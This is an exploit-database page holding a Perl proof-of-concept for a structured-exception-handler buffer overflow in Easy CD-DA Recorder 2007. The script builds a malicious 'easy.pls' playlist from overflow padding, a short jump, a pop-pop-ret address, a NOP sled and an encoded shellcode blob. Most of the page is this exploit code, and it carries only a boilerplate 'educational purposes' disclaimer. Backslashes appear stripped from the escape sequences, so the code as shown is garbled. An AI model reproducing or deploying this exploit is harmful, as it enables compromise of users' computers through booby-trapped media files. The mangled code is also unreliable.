Easy CD-DA Recorder 2007 SEH Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow
# Published : 2010-06-07
# Author : chap0
# Previous Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Next Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow 
# Date          : June 7, 2010
# Author        : chap0 [http://www.seek-truth.net]
# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
# Tested on     : Windows XP SP3 En
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# The Crew		: http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory		: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048
# --------------------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code :
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for Easy CD-DA Recorder n";
print "[+] Preparing payloadn";
sleep(1);
my $junk="x41" x 1108;

my $nseh="xebx06x90x90";

my $seh= "x70x80x08x10";   # ppr 0x10088070 [audconv.dll] 

my $nops="x90" x 24;

my $shellcode=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x30x42x50x42x30x4bx38x45x44x4ex53x4bx48x4ex47".
"x45x50x4ax37x41x30x4fx4ex4bx38x4fx44x4ax51x4bx38".
"x4fx35x42x42x41x50x4bx4ex49x54x4bx38x46x43x4bx38".
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx43x46x35x46x42x46x30x45x47x45x4ex4bx38".
"x4fx45x46x52x41x30x4bx4ex48x36x4bx58x4ex50x4bx34".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx38x4ex31x4bx48".
"x41x30x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x43".
"x42x4cx46x56x4bx38x42x54x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx58x42x34x4ex30x4bx38x42x57x4ex51x4dx4a".
"x4bx48x4ax36x4ax50x4bx4ex49x30x4bx48x42x58x42x4b".
"x42x50x42x30x42x50x4bx38x4ax46x4ex53x4fx35x41x53".
"x48x4fx42x56x48x55x49x48x4ax4fx43x48x42x4cx4bx37".
"x42x45x4ax46x42x4fx4cx48x46x30x4fx55x4ax46x4ax39".
"x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x56x41x56".
"x4ex46x43x46x42x30x5a";

$padding = "x41" x 10000;

my $payload = $junk.$nseh.$seh.$nops.$shellcode.$padding;

open (myfile, '>easy.pls');

print myfile $payload;

close (myfile);

print "[+] Storm the Gates of Helln"